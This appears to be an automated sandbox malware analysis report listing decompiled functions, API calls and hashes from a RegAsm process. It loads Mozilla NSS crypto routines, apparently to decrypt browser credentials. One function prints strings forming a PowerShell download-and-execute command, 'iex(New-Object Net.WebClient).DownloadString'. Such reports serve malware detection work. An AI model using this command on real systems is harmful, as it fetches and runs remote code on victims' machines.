Part of subcall function 6C1689E0: PR_Unlock.NSS3(?), ref: 6C168A35

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 152f098c0488574cece97a44a6ca9039a2b5381947b8eef851bef538fbeabf28
Instruction ID: 552a3f4f18b0e1870a7b098046e5f0c1c327c2386b42972912b3898cea179eac
Opcode Fuzzy Hash: 152f098c0488574cece97a44a6ca9039a2b5381947b8eef851bef538fbeabf28
Instruction Fuzzy Hash: 1451C7B6E002019FEB109F64DC85BAB37E8EF19218F150064EC1997B12FB31ED1987A2

Function 6C1A2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C1A2D7C,6C179192,?), ref: 6C1A248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C1A24A2
memset.VCRUNTIME140(6C1A2D7C,00000020,6C1A2D5C), ref: 6C1A250E
memset.VCRUNTIME140(6C1A2D9C,00000020,6C1A2D7C), ref: 6C1A2535
memset.VCRUNTIME140(?,00000020,?), ref: 6C1A255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C1A2583
PR_Unlock.NSS3(?), ref: 6C1A2594
PR_SetError.NSS3(00000000,00000000), ref: 6C1A25AF

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 4ac9e15a08074480b3b6fc65dba45bc12a7bc2201a4b5387e73d946bdeae4646
Instruction ID: 3a52f3bd10a273296e2791407aaa59f2d6bce46440df1f87628b460ac7298c0b
Opcode Fuzzy Hash: 4ac9e15a08074480b3b6fc65dba45bc12a7bc2201a4b5387e73d946bdeae4646
Instruction Fuzzy Hash: D54101B5E003459BEB049FB5CC987A93774BB59308F140A28ED09D7A82F770A5C5C691

Function 6C1A05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C1A05DA

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

TlsGetValue.KERNEL32(00000000), ref: 6C1A060C
EnterCriticalSection.KERNEL32 ref: 6C1A0629
TlsGetValue.KERNEL32(00000000), ref: 6C1A066F
EnterCriticalSection.KERNEL32 ref: 6C1A068C
PR_Unlock.NSS3 ref: 6C1A06AA
PK11_GetNextSafe.NSS3 ref: 6C1A06C3
PR_Unlock.NSS3 ref: 6C1A06F9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: d0da39a006af730b11d89ae96d142120d024c7787a4b7c04c1bf9a343f9872d0
Instruction ID: e14957597d863509cab3352d296ce984c5546de88d38236e8a088f4a15ecdde0
Opcode Fuzzy Hash: d0da39a006af730b11d89ae96d142120d024c7787a4b7c04c1bf9a343f9872d0
Instruction Fuzzy Hash: CB5150B8A01746CFDB00DFA9C48466ABBF0FF54318F118529D89A9B711EB30D485CB91

Function 6C1AA470 Relevance: 12.1, APIs: 8, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C1AA4A6

Part of subcall function 6C1B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B08B4

PORT_Alloc_Util.NSS3(?), ref: 6C1AA4EC

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C1AA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C1AA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C1AA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C1AA596
free.MOZGLUE(?), ref: 6C1AA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1AA5B6

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID:
API String ID: 3906949479-0
Opcode ID: 9cbf2bb9e51cbd6eac914d700fa5e22c1b275630dbb2cf701427fa4c0b9a9b2c
Instruction ID: ef8e338c9a74d525753f36696b62466e272e10671dc644aeff074cd5bb55cc62
Opcode Fuzzy Hash: 9cbf2bb9e51cbd6eac914d700fa5e22c1b275630dbb2cf701427fa4c0b9a9b2c
Instruction Fuzzy Hash: ED410675A00342DFDB10CFD9CC44B9ABBB1AF50308F158468D8695BB42E731E91ACBA1

Function 00412CC6 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412E16

Strings

')", xrefs: 00412D69
C:\ProgramData\, xrefs: 00412CF9
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412D6E
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412DB1
.ps1, xrefs: 00412D49

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: df6880e20a57a84da240bc776c21165822399d09cffb18d364baf5af53bf027d
Instruction ID: 18ad48594e3d47c47e9e1f447c6223f671804dde4fbb2b678883f5f4f1b680f5
Opcode Fuzzy Hash: df6880e20a57a84da240bc776c21165822399d09cffb18d364baf5af53bf027d
Instruction Fuzzy Hash: 50410C71E00119ABCF11FFA6DD46ACDB7B4AF04708F51406BF510B7191DBB86E8A8B98

Function 6C19AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C19AB3E,?,?,?), ref: 6C19AC35

Part of subcall function 6C17CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C17CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C19AB3E,?,?,?), ref: 6C19AC55

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C19AB3E,?,?), ref: 6C19AC70

Part of subcall function 6C17E300: TlsGetValue.KERNEL32 ref: 6C17E33C
Part of subcall function 6C17E300: EnterCriticalSection.KERNEL32(?), ref: 6C17E350
Part of subcall function 6C17E300: PR_Unlock.NSS3(?), ref: 6C17E5BC
Part of subcall function 6C17E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C17E5CA
Part of subcall function 6C17E300: TlsGetValue.KERNEL32 ref: 6C17E5F2
Part of subcall function 6C17E300: EnterCriticalSection.KERNEL32(?), ref: 6C17E606
Part of subcall function 6C17E300: PORT_Alloc_Util.NSS3(?), ref: 6C17E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C19AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C19AB3E), ref: 6C19ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C19AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C19AD2B

Part of subcall function 6C17F360: TlsGetValue.KERNEL32(00000000,?,6C19A904,?), ref: 6C17F38B
Part of subcall function 6C17F360: EnterCriticalSection.KERNEL32(?,?,?,6C19A904,?), ref: 6C17F3A0
Part of subcall function 6C17F360: PR_Unlock.NSS3(?,?,?,?,6C19A904,?), ref: 6C17F3D3

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 6d77ba03f385f4d18d5c04ab2ac6079bbdb867ccc7b92edb3f2cdea77f1455be
Instruction ID: 896a44a6e899a0d31e96fb35db44be30e1b58e2c4dd7e846861b9d5e8a21f21f
Opcode Fuzzy Hash: 6d77ba03f385f4d18d5c04ab2ac6079bbdb867ccc7b92edb3f2cdea77f1455be
Instruction Fuzzy Hash: 673129B1E006155FEB00DF69DC40AAF77B6EF84728B198528E8159BB40EB31DD19C7A1

Function 6C178C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C178C7C

Part of subcall function 6C219DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DC6
Part of subcall function 6C219DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C260A27), ref: 6C219DD1
Part of subcall function 6C219DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C219DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C178CB0
TlsGetValue.KERNEL32 ref: 6C178CD1
EnterCriticalSection.KERNEL32(?), ref: 6C178CE5
PR_Unlock.NSS3(?), ref: 6C178D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C178D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C178D93

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 401050174ffbbf5c06e0b3a1b3c4a0d1da8fcea3107c0254a2fbdf0a202aabf3
Instruction ID: 9013ea9c32e6e6ab5314b76b2d0d03e32f3932bea0be645b78430fa2b3611785
Opcode Fuzzy Hash: 401050174ffbbf5c06e0b3a1b3c4a0d1da8fcea3107c0254a2fbdf0a202aabf3
Instruction Fuzzy Hash: D3313571A00205AFEB20AF68DD447EAB7B0FF14318F240136EE1967B90D770A964CBE1

Function 6C198500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C1995DC,00000000,00000000,00000000,?,6C1995DC,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C198517

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C198585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C19859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C27D8C4,6C1995D0,?,?,?,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C1985CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C1985E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C177F4A,00000000,?), ref: 6C1985F4

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: a72c4ec001bba3262f8c9513cc682450e20630b1e7caebb3408c3ce7e5abb0a7
Instruction ID: aa2fa61672583a6d86a05cdd791e3be2eb76d7a1039b0e6229ab3bd06ba37135
Opcode Fuzzy Hash: a72c4ec001bba3262f8c9513cc682450e20630b1e7caebb3408c3ce7e5abb0a7
Instruction Fuzzy Hash: AA317EB2D0220057F71085289C90B6A3229AB3139CF660677F955DFFC2FB24DD578AA2

Function 6C164590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C1645B5

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C1645C9

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C1645E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C1645F8

Part of subcall function 6C1AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C1A8D2D,?,00000000,?), ref: 6C1AFB85
Part of subcall function 6C1AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C1AFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C164647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C27A0F4,?), ref: 6C16468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1646A1

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: 9cebdd3e34962e18ae5e0002433f29d18a78de627f6aa79bc1f71fe58e327b06
Instruction ID: 035420c0d11e0519e48d447ed156025d8739213024af459fdc6127636386307a
Opcode Fuzzy Hash: 9cebdd3e34962e18ae5e0002433f29d18a78de627f6aa79bc1f71fe58e327b06
Instruction Fuzzy Hash: 8731EAB1A013199BFF109E5ADC61BAB36A4EB45318F114038DD05EFB81EB75C41987A6

Function 6C1A4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C167296,00000000), ref: 6C1A4487
EnterCriticalSection.KERNEL32(?,?,?,6C167296,00000000), ref: 6C1A44A0
PR_Unlock.NSS3(?,?,?,?,6C167296,00000000), ref: 6C1A44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C167296,00000000), ref: 6C1A44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C167296,00000000), ref: 6C1A4530
free.MOZGLUE(?,?,?,?,?,6C167296,00000000), ref: 6C1A453C
PORT_FreeArena_Util.NSS3 ref: 6C1A454F

Part of subcall function 6C18CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C16B1EE,D958E836,?,6C1A51C5), ref: 6C18CAFA
Part of subcall function 6C18CAA0: PR_UnloadLibrary.NSS3(?,6C1A51C5), ref: 6C18CB09

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: dc2579550300edb964a765ebed300add0fc550bfffeb42e08eb6915078dc4425
Instruction ID: 9419086a2781ede6dd0ea0f10965795417793737dee387cb05e6eac96e9fe1d9
Opcode Fuzzy Hash: dc2579550300edb964a765ebed300add0fc550bfffeb42e08eb6915078dc4425
Instruction Fuzzy Hash: 09312DB8A04601DFDB00AFB9D088669B7F0FF05358F015669D89997B41EB35E895CFC2

Function 6C168C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C168C1B
EnterCriticalSection.KERNEL32 ref: 6C168C34
PL_ArenaAllocate.NSS3 ref: 6C168C65
PR_Unlock.NSS3 ref: 6C168C9C
PR_Unlock.NSS3 ref: 6C168CB6

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

Strings

KRAM, xrefs: 6C168C8F

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b95778481a76d2c01c4e6d740b0762edfebc1de766bc32e61ca87a7868652b7d
Instruction ID: a00c60e120bc914fc29bdf1cffe70855903cebb1558c70d5f6e7927def2d6f48
Opcode Fuzzy Hash: b95778481a76d2c01c4e6d740b0762edfebc1de766bc32e61ca87a7868652b7d
Instruction Fuzzy Hash: 022174B16056018FE700AF7AC484669F7F4FF05308F06896AD888CBB51DB35D895CB91

Function 6C1FA540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6C1FA390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1FA415

PK11_ExtractKeyValue.NSS3(00000000), ref: 6C1FA5AC
memcpy.VCRUNTIME140(?,?,?), ref: 6C1FA5BF
PK11_FreeSymKey.NSS3(00000000), ref: 6C1FA5C8

Part of subcall function 6C19ADC0: TlsGetValue.KERNEL32(?,6C17CDBB,?,6C17D079,00000000,00000001), ref: 6C19AE10
